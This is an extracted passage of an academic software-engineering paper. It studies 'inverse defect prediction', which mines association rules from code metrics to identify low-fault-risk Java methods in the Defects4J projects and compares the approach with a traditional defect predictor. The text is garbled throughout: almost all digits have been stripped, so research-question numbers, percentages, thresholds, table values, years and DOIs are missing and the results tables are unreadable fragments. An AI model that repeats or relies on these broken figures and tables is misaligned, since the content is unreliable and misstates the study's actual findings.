defect prediction is used to predict faults in (new) projects, for which no historical fault data exists, by using models trained on other projects. it is considered a challenging task in defect prediction (he et al., ; zimmermann et al., ; turhan et al., ). as we expect that the characteristics of lfr methods might be project-independent, idp could be applicable in a cross-project scenario. therefore, we investigate how generalizable our idp classifier is for cross-project use. rq : how does the classifier perform compared to a traditional defect prediction approach? the main purpose of defect prediction is to detect fault-prone code. most traditional defect prediction approaches are binary classifications, which classify a method either as (likely) faulty or not faulty. hence, they implicitly also detect methods with a lfr. therefore, we compare the performance of our classifier with the performance of a traditional defect prediction approach. study objects for our analysis, we used data from defects j, which was created by just, jalali & ernst ( ). defects j is a database and analysis framework that provides real faults for six real-world open-source projects written in java. for each fault, the original commit before the bug fix (faulty version), the original commit after the bug fix (fixed version), and a minimal patch of the bug fix are provided. the patch is minimal such that it contains only code changes that ( ) fix the fault and ( ) are necessary to keep the code compilable (e.g., when a bug fix involves method-signature changes). it does not contain changes that do not influence the semantics (e.g., changes in comments, local renamings), and changes that were included in the bug-fix commit but are not related to the actual fault (e.g., refactorings). due to the manual analysis, this dataset at the method level is much more precise than other datasets at the same level, such as shippey et al. ( ) and giger et al. ( ), which were generated from version control systems and issue trackers without further manual filtering. the authors of just, jalali & ernst ( ) confirmed that they considered every bug fix within a given time span. table presents the study objects and their characteristics. we computed the metrics sloc and #methods for the code revision at the last bug-fix commit of each project; the numbers do not comprise sample and test code. #faulty methods corresponds to the number of faulty methods derived from the dataset. fault data extraction defects j provides for each project a set of reverse patches , which represent bug fixes. to obtain the list of methods that were at least once faulty, we conducted the following a reverse patch reverts previous changes. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ steps for each patch. first, we checked out the source code from the project repository at the original bug-fix commit and stored it as fixed version. second, we applied the reverse patch to the fixed version to get to the code before the bug fix and stored the resulting faulty version. next, we analyzed the two versions created for every patch. for each file that was changed between the faulty and the fixed version, we parsed the source code to identify the methods. we then mapped the code changes to the methods to determine which methods were touched in the bug fix. after that, we had the list of faulty methods. figure summarizes these steps. we inspected all bug-fix patches and found that method changes in the patches do not represent bug fixes. while the patches are minimal, such that they contain only bug-related changes (see “study objects”), these ten method changes are semantic- preserving, only necessary because of changed signatures of other methods in the patch, and therefore included in defects j to keep the code compilable. figure presents an example. although these methods are part of the bug fix, they were not changed semantically and do not represent faulty methods. therefore, we decided to remove them from the faulty methods in our analysis. the names of these ten methods are provided in the dataset to this paper (niedermayr, röhm & wagner, ). table study objects. name sloc #methods #faulty methods jfreechart (chart) . k . k google closure compiler . k . k apache commons lang . k . k apache commons math . k . k mockito . k . k joda time . k . k b e cc f f f faulty # c e ed fixed # ce cleaned reverse patch fa f figure derivation of faulty methods. the original bug-fix commit c e ed to fix the faulty version f f f may contain unrelated changes. defect j provides a reverse patch, which contains only the actual fix. we applied it to the fixed version c e ed to get to fa f we then identified methods that were touched by the patch and computed their metrics at state fa f . full-size doi: . /peerj-cs. /fig- niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ procedure after extracting the faulty methods from the dataset, we computed the metrics listed in “idp approach.” we computed them for all faulty methods at their faulty version and for all methods of the application code at the state of the fixed version of the last patch. we used eclipse jdt ast (http://www.eclipse.org/jdt/) to create an ast visitor for computing the metrics. for all further processing, we used the statistical computing software r (r core team, ). to discretize the metrics m –m , we first computed their value distribution. figure shows that their values are not normally distributed (most values are very small). to create three classes for each of these metrics , we sorted the metric values, and computed the values at the end of the first and at the end of the second third. we then put all methods until the last occurrence of the value at the end of the first third into class , all methods until the last occurrence of the value at the end of the second third into class , and all other methods into class . table presents the value ranges of the resulting classes. the classes are the same for all six projects. we then aggregated multiple faulty occurrences of the same method (this occurs if a method is changed in more than one bug-fix patch) and created a unified dataset of faulty and non-faulty methods (see “data pre-processing”). next, we split the dataset into a training and a test set. for rq and rq , we used -fold cross-validation (witten et al., , chapter ). using the caret package (from jed wing et al. ( )), we randomly sampled the dataset of each project into ten stratified partitions of equal sizes. each partition is used once for testing the classifier, which is trained on the remaining nine partitions. to compute the association rules for rq —in which we study how generalizable the classifier is—for each project, we used the methods of the other five projects as training set for the classifier. before computing association rules, we applied the smote algorithm from the dmwr package (torgo, ) with a % over-sampling and a % under-sampling rate to each training set. after that, each training set was equally balanced ( % faulty methods, % non-faulty methods) . figure example of method change without behavior modification to preserve api compatibility. the method escapejavascript(string) invokes escapejavastylestring(string, boolean, boolean). a further parameter was added to the invoked method; therefore, it was necessary to adjust the invocation in escapejavascript(string). for invocations with the parameter value true, the behavior does not change (lang, patch , simplified). full-size doi: . /peerj-cs. /fig- code without sample and test code. we did not use the ntile function to create classes, because it always generates classes of the same size, such that instances with the same value may end up in different classes (e.g., if % of the methods have the complexity value , the first . % will end up in class , and the remaining . % with the same value will end up in class ). we computed the results for the empirical study once with and once without addressing the data imbalance in the training set. the prediction perfor- mance was better when applying smote, therefore, we decided to use it. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.eclipse.org/jdt/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we then used the implementation of the apriori algorithm (agrawal & srikant, ) in the arules package (hahsler, gruen & hornik, ; hahsler et al., ) to compute association rules with notfaulty as target item (rule consequent). we set the threshold for the minimum support to % and the threshold for the minimum confidence to % (support and confidence are explained in “association rule mining”). we experimented with different thresholds and these values produced good results (results for other configurations are in the dataset provided with this paper; niedermayr, röhm & wagner, ). the minimum support avoids overly infrequent (i.e., non-generalizable) rules from being created, and the minimum confidence prevents the creation of imprecise rules. note that no rule (with notfaulty as rule consequent) can reach a higher support than % after the smote pre-processing. after computing the rules, we removed redundant ones using the corresponding function from the apriori package. we then sorted the remaining rules descending by their confidence. using these rules, we created two classifiers to identify lfr methods. they differ in the number of comprised rules. the strict classifier uses the top n rules until the share of faulty methods in all methods (of the training set) exceeds . % in the lfr methods (of the training set). the more lenient classifier uses the top n rules until the share exceeds % in the lfr methods. (example: we applied the top one rule to the training set, then applied the next rule, : : : , until the matched methods in the training set contained table generated classes and their value ranges. metric class class class sloc [ ; ] [ ; ] [ ;∞) cyclomatic complexity [ ; ] [ ; ] [ ;∞) maximum nesting depth [ ; ] [ ; ] [ ;∞) maximum method chaining [ ; ] [ ; ] [ ;∞) unique variable identifiers [ ; ] [ ; ] [ ;∞) figure metrics m –m are not normally distributed. (a) sloc, (b) cyclomatic complexity, (c) maximum nesting depth, (d) maximum method chaining, and (e) unique variable identifiers. full-size doi: . /peerj-cs. /fig- niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . % out of all faults). figure presents how an increase in the number of selected rules affects the proportion of lfr methods and the share of faulty methods that they contain. for rq and rq , the classifiers were computed for each fold of each project. for rq , the classifiers were computed once for each project. to answer rq , we used -fold cross-validation to evaluate the classifiers separately for each project. we computed the number and proportion of methods that were classified as “lfr” but contained a fault (≈ false positives). furthermore, we computed precision and recall. our main goal is to identify those methods that we can say, with high certainty, contain hardly any faults. therefore, we consider it as more important to achieve a high precision than to predict all methods that do not contain any faults in the dataset. as the dataset is imbalanced with faulty methods in the minority, the proportion of faults in lfr methods might not be sufficient to assess the classifiers (smote was applied only to the training set). therefore, we further computed the fault-density reduction, which describes how much less likely the lfr methods contain a fault. for example, if % of all methods are classified as “lfr” and contain % of all faults, the factor is . it can also be read as: % of all methods contain only one fourth of the expected faults. we mathematically define the fault-density reduction factor based on methods as proportion of lfr methods out of all methods proportion of faulty lfr methods out of all faulty methods and based on sloc as proportion of sloc in lfr methods out of all sloc proportion of faulty lfr methods out of all faulty methods : for both classifiers (strict variant with . %, lenient variant with %), we present the metrics for each project and the resulting median. to answer rq , we assessed how common methods classified as “lfr” are. for each project, we computed the absolute number of lfr methods, their proportion out of all methods, and their extent by considering their sloc. lfr sloc corresponds to the sum of sloc of all lfr methods. the proportion of lfr sloc is computed out of all sloc of the project. % % % % % number of rules figure influence of the number of selected rules (lang). the number of rules influences the — proportion of low-fault-risk (lfr) methods and the — share of faulty methods in lfr out of all faulty methods. full-size doi: . /peerj-cs. /fig- niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to answer rq , we computed the association rules for each project with the methods of the other five projects as training data. like in rq and rq , we determined the number of used top n rules with the same thresholds ( . % and %). to allow a comparison with the within-project classifiers, we computed the same metrics like in rq and rq . to answer rq , we computed for each method the code and change metrics that were used in giger et al. ( ). the metrics and their descriptions are listed in table . we applied random forest as machine learning algorithm and configured it like in the paper of giger et al. ( ). we computed the results for within-project predictions using -fold cross-validation and we further computed the results for cross-project predictions like in rq . we present the same evaluation metrics as in the previous research questions. results this section presents the results to the research questions. the data to reproduce the results is available at (niedermayr, röhm & wagner, ). table rq : code and change metrics used in giger et al. ( ). metric name description code metrics fanin number of methods that reference a given method fanout number of methods referenced by a given method localvar number of local variables in the body of a method parameters number of parameters in the declaration commenttocoderatio ratio of comments to source code (line-based) countpath number of possible paths in the body of a method complexity mccabe cyclomatic complexity of a method execstmt number of executable source code statements maxnesting maximum nested depth of all control structures change metrics methodhistories number of times a method was changed authors number of distinct authors that changed a method stmtadded sum of all source code statements added to a method body maxstmtadded maximum number of source code statements added to a method body avgstmtadded average number of source code statements added to a method body stmtdeleted sum of all source code statements deleted from a method body maxstmtdeleted maximum number of source code statements deleted from a method body avgstmtdeleted average number of source code statements deleted from a method body churn sum of churn (stmtadded—stmtdeleted) maxchurn maximum churn avgchurn average churn decl number of method declaration changes cond number of condition expression changes in a method body elseadded number of added else-parts in a method body elsedeleted number of deleted else-parts from a method body niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rq : what is the precision of the classifier for low-fault-risk methods? table presents the results. the methods classified to have lfr by the stricter classifier, which allows a maximum fault share of . % in the lfr methods in the (balanced) training data, contain between two and eight faulty methods per project. the more lenient classifier, which allows a maximum fault share of %, classified between four and faulty methods as lfr. the median proportion of faulty methods in lfr methods is . % resp. . %. the fault-density reduction factor for the stricter classifier ranges between . and . (median: . ) when considering methods and between . and . (median: . ) when considering sloc. in the project lang, . % of all methods with . % of the sloc are classified as lfr and contain . % of all faults, thus, the factor is . (sloc-based: . ). the factor never falls below for both classifiers. table exemplarily presents the top three rules for lang. methods that work with fewer than two variables and do not invoke any methods as well as short methods without arithmetic operations, cast expressions, and method invocations are highly unlikely to contain a fault. rq : how large is the fraction of the code base consisting of methods classified as “low fault risk”? table presents the results. the stricter classifier classified between . % and table rq , rq : evaluation of within-project idp to identify low-fault-risk (lfr) methods. project faults in lfr lfr methods lfr methods lfr sloc lfr methods contain : : : % of all faults fault-density reduction # % prec rec # % # % (methods) (sloc) within-project idp, -fold: min. support = %, min. confidence = %, rules until fault share in training set = . % chart . % . % . % , . % , . % . % . . closure . % . % . % , . % , . % . % . . lang . % . % . % . % , . % . % . . math . % . % . % . % . % . % . . mockito . % . % . % . % , . % . % . . time . % . % . % , . % , . % . % . . median . % . % . % . % . % . % . . within-project idp, -fold: min. support = %, min. confidence = %, rules until fault share in training set = % chart . % . % . % , . % , . % . % . . closure . % . % . % , . % , . % . % . . lang . % . % . % . % , . % . % . . math . % . % . % . % . % . % . . mockito . % . % . % , . % , . % . % . . time . % . % . % , . % , . % . % . . median . % . % . % . % . % . % . . idp can identify methods with lfr. on average, only . % of the methods classified as “lfr” by the strict classifier are faulty. the identified lfr methods are, on average, . times less likely to contain a fault than an arbitrary method in the dataset. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . % of the methods as lfr (median: . %, mean: . %), the more lenient classifier matched between . % and . % of the methods (median: . %, mean: . %). the median of the comprised sloc in lfr methods is . % (mean: . %) respectively . % (mean: . %). rq : is a trained classifier for methods with low fault risk generalizable to other projects? table presents the results for the cross-project prediction with training table top three association rules for lang (within-project, fold ). # rule support (%) confidence (%) {uniquevariableidentifierslessthan , nomethodinvocations} ⇒ {notfaulty} . . {sloclessthan , nomethodinvocations, noarithmeticoperations} ⇒ {notfaulty} . . {sloclessthan , nomethodinvocations, nocastexpressions} ⇒ {notfaulty} . . table rq : evaluation of cross-project idp. project faults in lfr lfr methods lfr methods lfr sloc lfr methods contain : : : % of all faults fault-density reduction # % prec. rec. # % # % (methods) (sloc) cross-project idp: min. support = %, min. confidence = %, rules until fault share in training set = . % chart . % . % . % , . % , . % . % . . closure . % . % . % , . % , . % . % . . lang . % . % . % . % , . % . % . . math . % . % . % . % , . % . % . . mockito . % . % . % . % , . % . % . . time . % . % . % , . % , . % . % . . median . % . % . % . % . % . % . . cross-project idp: min. support = %, min. confidence = %, rules until fault share in training set = % chart . % . % . % , . % , . % . % . . closure . % . % . % , . % , . % . % . . lang . % . % . % . % , . % . % . . math . % . % . % . % , . % . % . . mockito . % . % . % . % , . % . % . . time . % . % . % , . % , . % . % . . median . % . % . % . % . % . % . . using within-project idp, on average, – % of the methods, comprising about – % of the sloc, can be assigned a lower importance during testing. in the best case, when ignoring . % of the methods ( . % of the sloc), it is still possible to catch . % of the faults (math). niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data from the respective other projects. compared to the results of the within-project prediction, except for math, the number of faults in lfr methods decreased or stayed the same in all projects for both classifier variants. while the median proportion of faults in lfr methods slightly decreased, the proportion of lfr methods also decreased in all projects except math. the median proportion of lfr methods is . % (sloc: . %) for the stricter classifier and . % (sloc: . %) for the more lenient classifier. the fault-density reduction improved compared to the within-project prediction for both the method and sloc level in both classifier variants: for the stricter classifier, the median of the method-based factor is . (+ . ); the median of the sloc-based factor is . (+ . ). figure illustrates the fault-density reduction for both within-project (rq , rq ) and cross-project (rq ) prediction. rq : how does the classifier perform compared to a traditional defect prediction approach? table presents the results of the within- and cross-project prediction according to the approach by giger et al. ( ). in the within-project prediction scenario, the classifier predicts on average . % of the methods to be non-faulty. as a consequence, the average recall regarding non-faulty methods reaches . %. however, the number of methods that are classified as non-faulty but actually contain a fault increases by magnitudes compared to the idp approach (i.e., precision deteriorates). for example, % of closure’s faulty methods are wrongly classified as non-faulty. the median fault-density reduction is . at the method level (strict idp: . ) and . when considering sloc (strict idp: . ). consequently, methods classified by the traditional approach to have a lfr are still less likely to contain a fault than other methods, but the difference is not as high as in the idp classifier. chart closure lang math mockito time fa ul t− de ns ity r ed uc tio n (m et ho ds ) figure comparison of the idp within-project ( . %, . %) with the idp cross-project ( . %, . %) classifiers (method-based). the fault-density reduction expresses how much less likely a lfr method contains a fault (definition in procedure). higher values are better (example: if % of the methods are lfr and contain % of all faults, the factor is ). the dashed line is at one; no value falls below. full-size doi: . /peerj-cs. /fig- using cross-project idp, on average, – % of the methods, comprising about – % of the sloc, can be classified as “lfr.” the methods classified by the stricter classifier contain, on average, less than one eleventh of the expected faults. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the results in the cross-project prediction scenario are similar. in four of the six projects, the number of faults in lfr methods increased compared with the within-project prediction scenario. the fault-density reduction deteriorated to . both at the method and sloc level (strict idp: . resp. . ). for all projects, idp outperformed the traditional approach. discussion the results of our empirical study show that only very few lfr methods actually contain a fault, and thus, they indicate that idp can successfully identify methods that are not fault-prone. on average, . % of the methods ( . % of the sloc) matched by the strict classifier contain only . % of all faults, resulting in a considerable fault-density reduction for the matched methods. in any case, lfr methods are less fault-prone than other methods (fault-density reduction is higher than one in all projects); based on methods, lfr methods are at least twice less likely to contain a fault. for the stricter classifier, the extent of the matched methods, which could be deferred in testing, is between % and % of the sloc of the respective project. the more lenient classifier matches more methods and sloc at the cost of a higher fault proportion, but still achieves satisfactory fault-density reduction values. this shows that the balance between fault risk and matched extent can be influenced by the number of considered rules to reflect the priorities of a software project. interestingly, the cross-project idp classifier, which is trained on data from the respective other five projects, exhibits a higher precision than the within-project idp classifier. except for the math project, the lfr methods contain fewer faulty methods in table rq : results of a traditional defect prediction approach. project faults in lfr lfr methods lfr methods lfr sloc lfr methods contain : : : % of all faults fault-density reduction # % prec. rec # % # % (methods) (sloc) within-project defect prediction: traditional approach used in giger et al. ( ) chart . % . % . % , . % , . % . % . . closure . % . % . % , . % , . % . % . . lang . % . % . % , . % , . % . % . . math . % . % . % . % , . % . % . . mockito . % . % . % , . % , . % . % . . time . % . % . % , . % , . % . % . . median . % . % . % . % . % . % . . cross-project defect prediction: traditional approach used in giger et al. ( ) chart . % . % . % , . % , . % . % . . closure . % . % . % , . % , . % . % . . lang . % . % . % , . % , . % . % . . math . % . % . % , . % , . % . % . . mockito . % . % . % , . % , . % . % . . time . % . % . % , . % , . % . % . . median . % . % . % . % . % . % . . niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the cross-project prediction scenario. this is in line with the method-based fault- density reduction factor of the strict classifier, which is in four of six cases better in the cross-project scenario (sloc-based: three of six cases). however, the proportion of matched methods decreased compared to the within-project prediction in most projects. accordingly, the cross-project results suggest that a larger, more diversified training set identifies lfr methods more conservatively, resulting in a higher precision and lower matching extent. math is the only project in which idp within-project prediction outperformed idp cross-project prediction. this project contains many methods with mathematical computations expressed by arithmetic operations, which are often wrapped in loops or conditions; most of the faults are located in these methods. therefore, the within-project classifiers used few, very precise rules for the identification of lfr methods. to sum up, our results show that the idp approach can be used to identify methods that are, due to the “triviality” of their code, less likely to contain any faults. hence, these methods require less focus during quality-assurance activities. depending on the criticality of the system and the risk one is willing to take, the development of tests for these methods can be deferred or even omitted in case of insufficient available test resources. the results suggest that idp is also applicable in cross-project prediction scenarios, indicating that characteristics of lfr methods differ less between projects than characteristics of faulty methods do. therefore, idp can be used in (new) projects with no (precise) historical fault data to prioritize the code to be tested. limitations a limitation of idp is that even lfr methods can contain faults. an inspection of faulty methods incorrectly classified to have a lfr showed that some faults were fixed by only adding further statements (e.g., to handle special cases). this means that a method can be faulty even if the existing code as such is not faulty (due to missing code). further imaginable examples for faulty lfr methods are simple getters that return the wrong variable, or empty methods that are unintentionally empty. therefore, while these methods are much less fault-prone, it cannot be assumed that they never contain any fault. consequently, excluding lfr methods from testing and other qa activities carries a risk that needs to be kept in mind. relation to defect prediction as discussed in detail in “introduction,” idp presents another view on defect prediction. the focus of idp on lfr methods requires an optimization toward precision, so that hardly any faulty methods are erroneously classified as trivial. the comparison with a traditional defect prediction approach showed that idp classified much fewer methods as trivial. however, methods classified by idp as trivial contain far fewer faulty methods, that is, idp achieves a higher precision. consequently, the identified trivial methods can be deferred or even excluded from quality-assurance activities. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ threats to validity next, we discuss the threats to internal and external validity. threats to internal validity the learning and evaluation was performed on information extracted from defects j (just, jalali & ernst, ). therefore, the quality of our data depends on the quality of defects j. common problems for defect datasets created by analyzing changes in commits that reference a bug ticket in an issue tracking system are as follows. first, commits that fix a fault but do not reference a ticket in the commit message cannot be detected (bachmann et al., ). consequently, the set of commits that reference a bug fix may not be a fair representation of all faults (bird et al., ; d’ambros, lanza & robbes, ; giger et al., ). second, bug tickets in the issue tracker may not always represent faults and vice versa. herzig, just & zeller ( ) pointed out that a significant amount of tickets in the issue trackers of open-source projects is misclassified. therefore, it is possible that not all bug-fix commits were spotted. third, methods may contain faults that have not been detected or fixed yet. in general, it is not possible to prove that a method does not contain any faults. fourth, a commit may contain changes (such as refactorings) that are not related to the bug fix, but this problem does not affect the defects j dataset due to the authors’ manual inspection. these threats are present in nearly all defect prediction studies, especially in those operating at the method level. defect prediction models were found to be resistant to such kind of noise to a certain extent (kim et al., ). defects j contains only faults that are reproducible and can be precisely mapped to methods; therefore, faulty methods may be under-approximated. in contrast, other datasets created without manual post-processing tend to over-approximate faults. to mitigate this threat, we replicated our idp evaluation with two study objects used in giger et al. ( ). the observed results were similar to our study. threats to external validity the empirical study was performed with six mature open-source projects written in java. the projects are libraries and their results may not be applicable to other application types, for example, large industrial systems with user interfaces. the results may also not be transferable to projects of other languages, for the following reasons: first, java is a strongly typed language that provides type safety. it is unclear if the idp approach works for languages without type safety, because it could be that even simple methods in such languages exhibit a considerable amount of faults. second, in case the approach as such is applicable to other languages, the collected metrics and the lfr classifier need to be validated and adjusted. other languages may use language constructs in a different way or use constructs that do not exist in java. for example, a classifier for the c language should take constructs such as gotos and the use of pointer arithmetic into consideration. furthermore, the projects in the dataset (published in ) did not contain code with lambda expressions introduced in java (http://www.oracle.com/technetwork/articles/java/architect-lambdas-part - .html). niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.oracle.com/technetwork/articles/java/architect-lambdas-part - .html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ therefore, in newer projects that make use of lambda expressions, the presence of lambdas should be taken into consideration when classifying methods. consequently, further studies are necessary to determine whether the results are generalizable. like in most defect prediction studies, we treated all faults as equal and did not consider their severity. according to ostrand, weyuker & bell ( ), the severity of bug tickets is often highly subjective. in reality, not all faults have the same importance, because some cause higher failure follow-up costs than others. conclusion developer teams often face the problem of scarce test resources and need therefore to prioritize their testing efforts (e.g., when writing new automated unit tests). defect prediction can support developers in this activity. in this paper, we propose an inverse view on defect prediction (idp) to identify methods that are so “trivial” that they contain hardly any faults. we study how unerringly such lfr methods can be identified, how common they are, and whether the proposed approach is applicable for cross- project predictions. we show that idp using association rule mining on code metrics can successfully identify lfr methods. the identified methods contain considerably fewer faults than the average code and can provide a savings potential for qa activities. depending on the parameters, a lower priority for qa can be assigned on average to . % resp. . % of the methods, amounting to . % resp. . % of the sloc. while cross-project defect prediction is a challenging task (he et al., ; zimmermann et al., ), our results suggest that the idp approach can be applied in a cross-project prediction scenario at the method level. in other words, an idp classifier trained on one or more (java open-source) projects can successfully identify lfr methods in other java projects for which no—or no precise—fault data exists. for future work, we want to replicate this study with closed-source projects, projects of other application types, and projects in other programming languages. it is also of interest to investigate which metrics and classifiers are most effective for the idp purpose and whether they differ from the ones used in traditional defect prediction. moreover, we plan to study whether code coverage of lfr methods differs from code coverage of other methods. if guidelines to meet a certain code coverage level are set by the management, unmotivated testers may add tests for lfr methods first because it might be easier to write tests for those methods. consequently, more complex methods with a higher fault risk may remain untested once the target coverage is achieved. therefore, we want to investigate whether this is a problem in industry and whether it can be addressed with an adjusted code-coverage computation, which takes lfr methods into account. acknowledgements we thank nils göde, florian deißenböck, and the anonymous reviewers for their valuable feedback. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this work was funded by the institute of software technology of the university of stuttgart and the german federal ministry of education and research (bmbf), grant “sofie, is a.” the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: institute of software technology of the university of stuttgart. german federal ministry of education and research (bmbf): sofie, is a. competing interests rainer niedermayr and tobias röhm are employees of cqse gmbh. the responsibility for this article lies with the authors. author contributions � rainer niedermayr conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � tobias röhm conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. � stefan wagner conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: niedermayr, rainer ( ): dataset: too trivial to test? figshare. fileset. doi . /m .figshare. .v . references agrawal r, imieli�nski t, swami a. . mining association rules between sets of items in large databases. acm sigmod record ( ): – doi . / . . agrawal r, srikant r. . fast algorithms for mining association rules. in: proceedings of th international conference on very large data bases (vldb’ ). san francisco: morgan kaufmann, vol. , – . bacchelli a, d’ambros m, lanza m. . are popular classes more defect prone? in: proceedings of th international conference on fundamental approaches to software engineering (fase’ ). berlin, heidelberg: springer, vol. , – doi . / - - - - _ . bachmann a, bird c, rahman f, devanbu p, bernstein a. . the missing links: bugs and bug-fix commits. in: proceedings of th international symposium on foundations of software engineering (fse’ ). new york: acm, – . niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bayardo rj, agrawal r, gunopulos d. . constraint-based rule mining in large, dense databases. in: proceedings of the th international conference on data engineering (icde’ ). piscataway: ieee, – doi . /icde. . . bertolino a. . software testing research: achievements, challenges, dreams. in: proceedings of future of software engineering (fose’ ). los alamitos: ieee computer society, – doi . /fose. . . bird c, bachmann a, aune e, duffy j, bernstein a, filkov v, devanbu p. . fair and balanced? bias in bug-fix datasets. in: proceedings of th joint meeting of the european software engineering conference and the symposium on the foundations of software engineering (esec/fse’ ). new york: acm, – . bird c, nagappan n, murphy b, gall h, devanbu p. . don’t touch my code! examining the effects of ownership on software quality. in: proceedings of th joint meeting of the european software engineering conference and the symposium on the foundations of software engineering (esec/fse’ ). new york: acm, – . bowes d, hall t, harman m, jia y, sarro f, wu f. . mutation-aware fault prediction. in: proceedings of th international symposium on software testing and analysis (issta’ ). new york: acm, – . catal c. . software fault prediction: a literature review and current trends. expert systems with applications ( ): – doi . /j.eswa. . . . catal c, diri b. . a systematic review of software fault prediction studies. expert systems with applications ( ): – doi . /j.eswa. . . . chawla nv, bowyer kw, hall lo, kegelmeyer wp. . smote: synthetic minority over-sampling technique. journal of artificial intelligence research : – doi . /jair. . czibula g, marian z, czibula ig. . software defect prediction using relational association rule mining. information sciences : – doi . /j.ins. . . . d’ambros m, lanza m, robbes r. . evaluating defect prediction approaches: a benchmark and an extensive comparison. empirical software engineering ( – ): – doi . /s - - - . jed wing mkc, weston s, williams a, keefer c, engelhardt a, cooper t, mayer z, kenkel b, benesty m, lescarbeau r, ziem a, scrucca l, tang y, candan c, hunt t, the r core team. . caret: classification and regression training. r package version . - . available at https://topepo.github.io/caret/. giger e, d’ambros m, pinzger m, gall hc. . method-level bug prediction. in: proceedings of th international symposium on empirical software engineering and measurement (esem’ ). new york: acm, – . gosling j, joy b, steele g, bracha g, buckley a. . the java language specification, java se edition, february . available at http://docs.oracle.com/javase/specs/jls/se /html/index.html (accessed march ). hahsler m, buchta c, gruen b, hornik k. . arules: mining association rules and frequent itemsets. r package version . - . available at http://mhahsler.github.io/arules/. hahsler m, gruen b, hornik k. . arules—a computational environment for mining association rules and frequent item sets. journal of statistical software ( ): – doi . /jss.v .i . hall t, beecham s, bowes d, gray d, counsell s. . a systematic literature review on fault prediction performance in software engineering. ieee transactions on software engineering ( ): – doi . /tse. . . niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /icde. . http://dx.doi.org/ . /fose. . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /jair. http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /s - - - https://topepo.github.io/caret/ http://docs.oracle.com/javase/specs/jls/se /html/index.html http://mhahsler.github.io/arules/ http://dx.doi.org/ . /jss.v .i http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ haas r, niedermayr r, jurgens e. . teamscale: tackle technical debt and control the quality of your software. in: proceedings of the nd international conference on technical debt (techdebt' tools track). piscataway: ieee. hassan ae. . predicting faults using the complexity of code changes. in: proceedings of st international conference on software engineering (icse’ ). los alamitos: ieee computer society, – doi . /icse. . . hata h, mizuno o, kikuno t. . bug prediction based on fine-grained module histories. in: proceedings of th international conference on software engineering (icse’ ). piscataway: ieee, – . he z, shu f, yang y, li m, wang q. . an investigation on the feasibility of cross-project defect prediction. automated software engineering ( ): – doi . /s - - - . heinemann l, hummel b, steidl d. . teamscale: software quality control in real-time. in: proceedings of th international conference on software engineering (icse’ ), new york: acm. herzig k, just s, zeller a. . it’s not a bug, it’s a feature: how misclassification impacts bug prediction. in: proceedings of th international conference on software engineering (icse’ ). piscataway: ieee, – . hummel b. . mccabe’s cyclomatic complexity and why we don’t use it. available at https://www.cqse.eu/en/blog/mccabe-cyclomatic-complexity/ (accessed march ). just r, jalali d, ernst md. . defects j: a database of existing faults to enable controlled testing studies for java programs. in: proceedings of rd international symposium on software testing and analysis (issta’ ). tool demo, new york: acm, – . karthik r, manikandan n. . defect association and complexity prediction by mining association and clustering rules. in: proceedings of nd international conference on computer engineering and technology (iccet’ ). piscataway: ieee, vol. , . khoshgoftaar tm, gao k, seliya n. . attribute selection and imbalanced data: problems in software defect prediction. in: proceedings of nd international conference on tools with artificial intelligence (ictai’ ). piscataway: ieee, vol. , – . kim s, whitehead ej jr, zhang y. . classifying software changes: clean or buggy? ieee transactions on software engineering ( ): – doi . /tse. . . kim s, zhang h, wu r, gong l. . dealing with noise in defect prediction. in: proceedings of rd international conference on software engineering (icse’ ). piscataway: ieee, – . kim s, zimmermann t, whitehead ej jr, zeller a. . predicting faults from cached history. in: proceedings of th international conference on software engineering (icse’ ). los alamitos: ieee computer society, – . lee t, nam j, han d, kim s, in hp. . micro interaction metrics for defect prediction. in: proceedings of th joint meeting of the european software engineering conference and the symposium on the foundations of software engineering (esec/fse’ ). new york: acm, – . longadge r, dongre s, malik l. 